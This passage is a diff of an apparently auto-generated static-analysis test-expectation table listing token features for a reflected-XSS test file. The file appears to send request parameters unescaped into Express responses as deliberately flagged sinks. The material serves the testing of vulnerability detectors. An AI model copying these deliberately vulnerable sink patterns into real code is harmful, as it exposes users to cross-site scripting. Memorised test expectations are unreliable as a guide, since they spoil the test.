contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:59:13:59:14 | {} | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:59:13:59:14 | {} | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:59:13:59:14 | {} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:5 | obj | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:5 | obj | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:5 | obj | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:5 | obj | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:5 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:7 | obj.p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:7 | obj.p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:7 | obj.p | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:7 | obj.p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:7 | obj.p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:11 | obj.p = p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:11 | obj.p = p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:11 | obj.p = p | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:11 | obj.p = p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:60:3:60:11 | obj.p = p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:60:7:60:7 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:60:7:60:7 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:60:7:60:7 | p | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:60:7:60:7 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:60:7:60:7 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:60:11:60:11 | p | assignedToPropName | p | +| autogenerated/Xss/ReflectedXss/tst2.js:60:11:60:11 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:60:11:60:11 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:60:11:60:11 | p | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:60:11:60:11 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:60:11:60:11 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:11 | other | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:11 | other | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:11 | other | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:11 | other | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:11 | other | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:25 | other | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:25 | other | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:25 | other | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:25 | other | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:25 | other | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:25 | other = fclone(obj) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:25 | other = fclone(obj) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:25 | other = fclone(obj) | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:25 | other = fclone(obj) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:61:7:61:25 | other = fclone(obj) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:20 | fclone | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:20 | fclone | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:20 | fclone | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:20 | fclone | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:20 | fclone | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:25 | exceptional return of fclone(obj) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:25 | exceptional return of fclone(obj) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:25 | exceptional return of fclone(obj) | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:25 | exceptional return of fclone(obj) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:25 | exceptional return of fclone(obj) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:25 | fclone(obj) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:25 | fclone(obj) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:25 | fclone(obj) | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:25 | fclone(obj) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:61:15:61:25 | fclone(obj) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:61:22:61:24 | obj | CalleeFlexibleAccessPath | fclone | | autogenerated/Xss/ReflectedXss/tst2.js:61:22:61:24 | obj | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:61:22:61:24 | obj | calleeImports | fclone | @@ -22106,6 +147191,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:61:22:61:24 | obj | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | | autogenerated/Xss/ReflectedXss/tst2.js:61:22:61:24 | obj | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:61:22:61:24 | obj | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:5 | res | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:10 | res.send | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:13 | exceptional return of res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:13 | exceptional return of res.send(p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:13 | exceptional return of res.send(p) | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:13 | exceptional return of res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:13 | exceptional return of res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:13 | res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:13 | res.send(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:13 | res.send(p) | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:13 | res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:63:3:63:13 | res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:63:7:63:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:63:7:63:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:63:7:63:10 | send | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:63:7:63:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:63:7:63:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:63:12:63:12 | p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:63:12:63:12 | p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:63:12:63:12 | p | contextFunctionInterfaces | | @@ -22114,6 +147224,36 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:63:12:63:12 | p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:63:12:63:12 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:63:12:63:12 | p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:5 | res | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:10 | res.send | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:19 | exceptional return of res.send(other.p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:19 | exceptional return of res.send(other.p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:19 | exceptional return of res.send(other.p) | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:19 | exceptional return of res.send(other.p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:19 | exceptional return of res.send(other.p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:19 | res.send(other.p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:19 | res.send(other.p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:19 | res.send(other.p) | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:19 | res.send(other.p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:64:3:64:19 | res.send(other.p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:64:7:64:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:64:7:64:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:64:7:64:10 | send | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:64:7:64:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:64:7:64:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:64:12:64:16 | other | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:64:12:64:16 | other | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:64:12:64:16 | other | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:64:12:64:16 | other | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:64:12:64:16 | other | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:64:12:64:18 | other.p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:64:12:64:18 | other.p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:64:12:64:18 | other.p | contextFunctionInterfaces | | @@ -22122,12 +147262,51 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:64:12:64:18 | other.p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:64:12:64:18 | other.p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:64:12:64:18 | other.p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:64:18:64:18 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:64:18:64:18 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:64:18:64:18 | p | enclosingFunctionBody | req res p req params obj obj p p other fclone obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:64:18:64:18 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:64:18:64:18 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:67:7:67:8 | jc | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:7:67:8 | jc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:7:67:8 | jc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:7:67:8 | jc | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:67:7:67:32 | jc | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:7:67:32 | jc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:7:67:32 | jc | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:67:7:67:32 | jc = re ... cycle') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:7:67:32 | jc = re ... cycle') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:7:67:32 | jc = re ... cycle') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:67:12:67:18 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:12:67:18 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:12:67:18 | require | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:67:12:67:32 | exceptional return of require ... cycle') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:12:67:32 | exceptional return of require ... cycle') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:12:67:32 | exceptional return of require ... cycle') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:67:12:67:32 | require ... cycle') | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:12:67:32 | require ... cycle') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:67:12:67:32 | require ... cycle') | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:67:20:67:31 | 'json-cycle' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/ReflectedXss/tst2.js:67:20:67:31 | 'json-cycle' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:67:20:67:31 | 'json-cycle' | calleeImports | | | autogenerated/Xss/ReflectedXss/tst2.js:67:20:67:31 | 'json-cycle' | contextFunctionInterfaces | | | autogenerated/Xss/ReflectedXss/tst2.js:67:20:67:31 | 'json-cycle' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:67:20:67:31 | 'json-cycle' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:68:1:68:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:1:68:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:1:68:3 | app | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:68:1:68:7 | app.get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:1:68:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:1:68:7 | app.get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:68:1:77:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:1:77:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:1:77:2 | app.get ... T OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:68:1:77:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:1:77:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:1:77:2 | exceptional return of app.get ... T OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:68:5:68:7 | get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:5:68:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:5:68:7 | get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:68:9:68:14 | '/baz' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:68:9:68:14 | '/baz' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:68:9:68:14 | '/baz' | calleeImports | express | @@ -22135,6 +147314,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:68:9:68:14 | '/baz' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:68:9:68:14 | '/baz' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:68:9:68:14 | '/baz' | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:68:16 | jc | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:68:16 | jc | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:68:16 | jc | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:68:16 | jc | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:68:16 | jc | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:68:16 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:68:16 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:68:16 | this | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:68:16 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:68:16 | this | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | 'arguments' object of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | exceptional return of anonymous function | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | exceptional return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | functio ... OT OK\\n} | calleeImports | express | @@ -22142,6 +147341,182 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | functio ... OT OK\\n} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | functio ... OT OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | return of anonymous function | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:68:17:77:1 | return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:68:26:68:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:26:68:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:26:68:28 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:26:68:28 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:68:26:68:28 | req | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:68:26:68:28 | req | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:68:26:68:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:68:26:68:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:68:26:68:28 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:68:26:68:28 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:68:31:68:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:31:68:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:31:68:33 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:68:31:68:33 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:68:31:68:33 | res | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:68:31:68:33 | res | enclosingFunctionBody | req res p req params obj obj p p other jc retrocycle jc decycle obj res send p res send other p | +| autogenerated/Xss/ReflectedXss/tst2.js:68:31:68:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:68:31:68:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:68:31:68:33 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:68:31:68:33 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:11 | { p } | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:11 | { p } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:69:7:69:11 | { p } | enclosingFunctionBody | 